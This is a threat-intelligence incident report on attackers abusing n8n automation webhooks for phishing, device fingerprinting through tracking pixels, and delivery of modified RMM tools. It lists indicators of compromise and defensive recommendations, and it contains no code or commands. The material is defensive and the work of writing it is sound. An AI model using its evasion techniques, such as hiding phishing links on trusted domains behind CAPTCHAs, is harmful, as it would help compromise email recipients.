Full Report
Threat actors have been observed weaponizing n8n, a popular artificial intelligence (AI) workflow automation platform, to facilitate sophisticated phishing campaigns and deliver malicious payloads or fingerprint devices by sending automated emails. "By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery
Analysis Summary
# Incident Report: Abuse of n8n Automation Webhooks for Malware Delivery
## Executive Summary
Threat actors have weaponized the n8n AI workflow automation platform to conduct sophisticated phishing and device fingerprinting campaigns. By utilizing legitimate `*.app.n8n.cloud` subdomains, attackers bypass traditional security filters to deliver modified Remote Monitoring and Management (RMM) tools. The campaign has seen a significant surge in volume, with a 686% increase in malicious activity observed between January 2025 and March 2026.
## Incident Details
- **Discovery Date:** April 15, 2026 (Public Report by Cisco Talos)
- **Incident Date:** October 2025 – Present
- **Affected Organization:** Multiple; users of n8n and recipients of phishing emails
- **Sector:** Technology / AI Automation
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** October 2025 (Earliest identified activity)
- **Vector:** Phishing via Email
- **Details:** Attackers send emails containing links to n8n-hosted webhook URLs or embedding invisible tracking pixels. These links often masquerade as "shared documents."
### Lateral Movement
- **Details:** Attackers utilize modified versions of legitimate RMM tools (Datto and ITarian Endpoint Management) to maintain access and potentially move laterally within compromised environments.
### Data Exfiltration/Impact
- **Details:** Device fingerprinting (collecting IP, email, and browser data) and the establishment of persistent remote access to victim workstations.
### Detection & Response
- **How it was discovered:** Cisco Talos researchers observed a massive spike in malicious email traffic originating from or linking to n8n infrastructure.
- **Response actions taken:** Threat intelligence published to alert organizations; research highlights the need for better monitoring of low-code/no-code platforms.
## Attack Methodology
- **Initial Access:** Phishing emails containing n8n webhook URLs.
- **Persistence:** Installation of modified RMM tools (Datto/ITarian) as services.
- **Defense Evasion:** Use of trusted `*.n8n.cloud` domains to bypass email filters; use of CAPTCHAs to hide malicious payloads from automated scanners.
- **Discovery:** Device fingerprinting via invisible tracking pixels embedded in emails.
- **Lateral Movement:** Facilitated through RMM tool capabilities.
- **Exfiltration:** Tracking parameters (email addresses, device info) sent via HTTP GET requests to attacker-controlled webhooks.
- **Impact:** Deployment of persistent remote access trojans (MSI/EXE installers).
## Impact Assessment
- **Financial:** Not disclosed, but associated with high risks of ransomware via RMM access.
- **Data Breach:** Compromise of user metadata and potential full system access.
- **Operational:** Potential for complete takeover of infected endpoints.
- **Reputational:** Abuse of n8n’s brand/infrastructure to facilitate attacks.
## Indicators of Compromise
- **Network indicators:**
- `[unique_subdomain].app.n8n[.]cloud`
- Outbound connections to Datto or ITarian C2 infrastructure.
- **File indicators:**
- Malicious `.msi` or `.exe` installers delivered via n8n links.
- **Behavioral indicators:**
- Web requests to n8n URLs triggered immediately upon opening an email.
- Unexpected CAPTCHA prompts appearing after clicking "shared document" links.
## Response Actions
- **Containment measures:** Blocking traffic to suspicious n8n subdomains.
- **Eradication steps:** Removal of unauthorized RMM software from endpoints.
- **Recovery actions:** Resetting credentials for users who interacted with the phishing links.
## Lessons Learned
- **Key takeaways:** Trusted "Low-Code/No-Code" platforms are highly attractive to attackers because their infrastructure is often pre-whitelisted by security vendors.
- **What could have been done better:** Earlier detection of the specific webhook behavior that allows n8n to serve programmatically pulled HTML/JavaScript content as a proxy for external malware hosts.
## Recommendations
- **Prevention:** Implement strict controls or "DNS Sinkholing" for automation platforms unless specifically required for business operations.
- **Detection:** Monitor for unusual outbound HTTP GET requests from email clients to cloud automation domains.
- **Email Security:** Update email gateways to inspect the destination of links even if they use high-reputation domains like `*.n8n.cloud`.